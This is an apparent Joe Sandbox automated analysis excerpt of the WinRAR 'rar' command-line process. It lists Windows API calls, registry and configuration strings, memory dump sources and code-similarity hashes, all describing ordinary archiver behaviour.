• RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF702C4495D,?,?,?,00007FF702C37E7D), ref: 00007FF702C44831
• ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF702C4495D,?,?,?,00007FF702C37E7D), ref: 00007FF702C44853
• RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF702C4495D,?,?,?,00007FF702C37E7D), ref: 00007FF702C448A6
Strings
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
• Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                                                                            • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                                                                                                                                                            • API String ID: 1800380464-3408810217
                                                                                                                                                                                                                                            • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                            • Instruction ID: 2423bb8c01f9b26fb8d906c710766e1209eab9ec44755b28ef72c256e74c43bf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1319223718A8165EB60EB21EC106BBAB51FF847A4F805231EE4D47B99EFECD144C710

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C343D1
                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C34402
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C3440D
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C3443E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: CloseFileModuleNameOpenQueryValue
• String ID: AppData$Software\WinRAR\Paths
• API String ID: 3617018055-3415417297
• Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
• Instruction ID: e156cecf612dc6333a1e6e48b2e1476daa09418f1d7f95ea6d9027f4af576c23
• Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
• Instruction Fuzzy Hash: 1E112E23A18742A6EB21BF26AC005AABB60FF84BD4F845531EA4E07755DFBCD544C760

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID:
• String ID: H9
• API String ID: 0-2207570329
• Opcode ID: 19b84a5dc8f1e1731eb20c15cd5d03a2218ffa5299a76aab5d0559900d89bcd1
• Instruction ID: e76733f4aa280140a86d2c8344a88ba825ee2bdc4d678ca012405aff91a138d8
• Opcode Fuzzy Hash: 19b84a5dc8f1e1731eb20c15cd5d03a2218ffa5299a76aab5d0559900d89bcd1
• Instruction Fuzzy Hash: A0E1E563A08A9295EB14EB25E884BFEABA5FF4574CF854431CE0D43385DF78E558C720

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3350704910-0
                                                                                                                                                                                                                                            • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                            • Instruction ID: 4a6c3843d5166364996ccc495863609e6f71b8a47cbfaed3b603bbd69442f089
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7519327608641A6EB24EF25E81437BAB60FF45B80F940135EE5E46A90CFBCE546C711

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: swprintf
                                                                                                                                                                                                                                            • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                                                                                            • API String ID: 233258989-2235180025
                                                                                                                                                                                                                                            • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                            • Instruction ID: 9edd5561ec3cfedb66ac1502abfe6a0e0c102b9863744bf10c7a9c51ec61eec5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6241AE23B08A42A1EB10FB21DC211BBABA4EF417A4F900136EA5E037D5EFBCD541C320

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SHGetMalloc.SHELL32(?,00000800,?,00007FF702C34432,?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C340C4
                                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C340DF
                                                                                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32 ref: 00007FF702C340F1
                                                                                                                                                                                                                                              • Part of subcall function 00007FF702C23458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF702C3413F,?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C234A0
                                                                                                                                                                                                                                              • Part of subcall function 00007FF702C23458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF702C3413F,?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C234D5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                                                                                            • String ID: WinRAR
                                                                                                                                                                                                                                            • API String ID: 977838571-3970807970
                                                                                                                                                                                                                                            • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                            • Instruction ID: 1a63354004413515bdbb848dc945d388eca340ccf95e6ebcb2f1bd7b580fb6b2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50216F17A0CA42A0EB54BF22EC501BBAB60AF99BD0B885031EF4E57759DFBCD444C760
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2244327787-0
                                                                                                                                                                                                                                            • Opcode ID: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                                                                                                                                                                                                            • Instruction ID: e9f3a453a74b6e8c972f683b46bd2286a4cf148c16d8a355355acd6ea4314c23
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF219622E0C94691EB60AB15EC0033BEAA4FF45B94FA84131E95D4B6C6CFFDE449C761
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID:
• String ID: AFUM$default.sfx
• API String ID: 0-2491287583
• Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
• Instruction ID: e655844d1d7cfbe9e346c11fb53dbae0cadf2c05bfd1e33f7a4806939d8d9a6d
• Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
• Instruction Fuzzy Hash: D881B927B0CA9260EB78BB1199122BBAA91AF52794FC48031DA8D077C5DFED9485C770
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: FileHandleType
• String ID: @
• API String ID: 3000768030-2766056989
• Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
• Instruction ID: fb5102cffeca32d7d00e06bee89b9a411ecbcf1c2b4cbc71386a50ede2182bb6
• Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
• Instruction Fuzzy Hash: A921D423A1C74250EB609B25AC9803AAE59EF45774F781335DA6F067D4CF7CE881C315
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: Threadwcschr$CreateExceptionPriorityThrow
• String ID: CreateThread failed
• API String ID: 1217111108-3849766595
• Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
• Instruction ID: c784816a1432ee258f346f3ebb447b0a22ed7c8ea57caf2e7a391b423457d760
• Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
• Instruction Fuzzy Hash: 11113033A08A42A2E705FB14EC4117BBB61FF84798FD44132E65D02659EFBCE546C750
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: CriticalSection$EnterEventLeave
• String ID:
• API String ID: 3094578987-0
• Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
• Instruction ID: ccffaad693fddec373cec6edcce536eacf59a3c801b9d948b7966c860140edc4
• Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
• Instruction Fuzzy Hash: 30F06223A08A4692DB60FF11E94007BA761FF89BD8F844131DE9D06669CFACD945CB10
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
• Instruction ID: 801d93f86373deda1acdf74ddc0ff6f83b996a98bc78805ab8cc8e665f7a26e7
• Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
• Instruction Fuzzy Hash: 1CE01A22B0870562EB44BB219C8937B6B526F84741F405438CC0E46392CFBDA408C361
APIs
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: ConsoleFileHandleModeType
• String ID:
• API String ID: 4141822043-0
APIs
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: CharEnvironmentExpandStrings
• String ID:
• API String ID: 4052775200-0
APIs
• CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF702C17EBE,00000000,00000000,00000000,00000000,00000007,00007FF702C17C48), ref: 00007FF702C21B8D
• CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF702C17EBE,00000000,00000000,00000000,00000000,00000007,00007FF702C17C48), ref: 00007FF702C21BD7
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: ExceptionThrowstd::bad_alloc::bad_alloc
• String ID:
• API String ID: 932687459-0
APIs
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
APIs
Similarity
• API ID: ErrorFileLastPointer
• API String ID: 2976181284-0
APIs
• setbuf.LIBCMT ref: 00007FF702C17A7B
  • Part of subcall function 00007FF702C62AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF702C67EF3
• setbuf.LIBCMT ref: 00007FF702C17A8F
  • Part of subcall function 00007FF702C17B44: GetStdHandle.KERNEL32(?,?,?,00007FF702C17A9E), ref: 00007FF702C17B4A
  • Part of subcall function 00007FF702C17B44: GetFileType.KERNELBASE(?,?,?,00007FF702C17A9E), ref: 00007FF702C17B56
  • Part of subcall function 00007FF702C17B44: GetConsoleMode.KERNEL32(?,?,?,00007FF702C17A9E), ref: 00007FF702C17B69
  • Part of subcall function 00007FF702C62ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF702C62AD0
  • Part of subcall function 00007FF702C62B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF702C62C1C
Similarity
• API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
• API String ID: 4044681568-0
APIs
Similarity
• API ID: ErrorFileLastPointer
• API String ID: 2976181284-0
APIs
• GetFileAttributesW.KERNELBASE(00000800,00007FF702C2305D,?,?,?,?,?,?,?,?,00007FF702C34126,?,?,?,?,00000800), ref: 00007FF702C230F0
• GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF702C34126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF702C23119
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
• Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3188754299-0
APIs
Similarity
• API ID: DirectoryLibraryLoadSystem
• String ID:
• API String ID: 1175261203-0
APIs
Similarity
• API ID: Process$AffinityCurrentMask
• String ID:
• API String ID: 1231390398-0
APIs
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9ac513db4036a5898ded250dd79eb32afe9a02ed88e0a62a20bc990054a4dda4
                                                                                                                                                                                                                                            • Instruction ID: f5136ec5bff3bcfedfb246cbb1bb306fb006404218d829b159947905073e4b89
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ac513db4036a5898ded250dd79eb32afe9a02ed88e0a62a20bc990054a4dda4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3EE1C523A0C682A1FB20AA249C546BBEF52EF41B98FC44135DE4D4B7D6DFED9449C720
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f9e8ef509cf6c131bd0f799b7968fd127fe3009836c6d6a2c7defeaf5bae96b7
                                                                                                                                                                                                                                            • Instruction ID: 64c79ab5e03b8edb121ab0ec9c68cb0473bef7f7cf56d512d8a23d00f661d840
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9e8ef509cf6c131bd0f799b7968fd127fe3009836c6d6a2c7defeaf5bae96b7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B512773518BD195E700AF24A8451EE7BA8FB44F88F58423ADA880B79ADF78A155C331
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
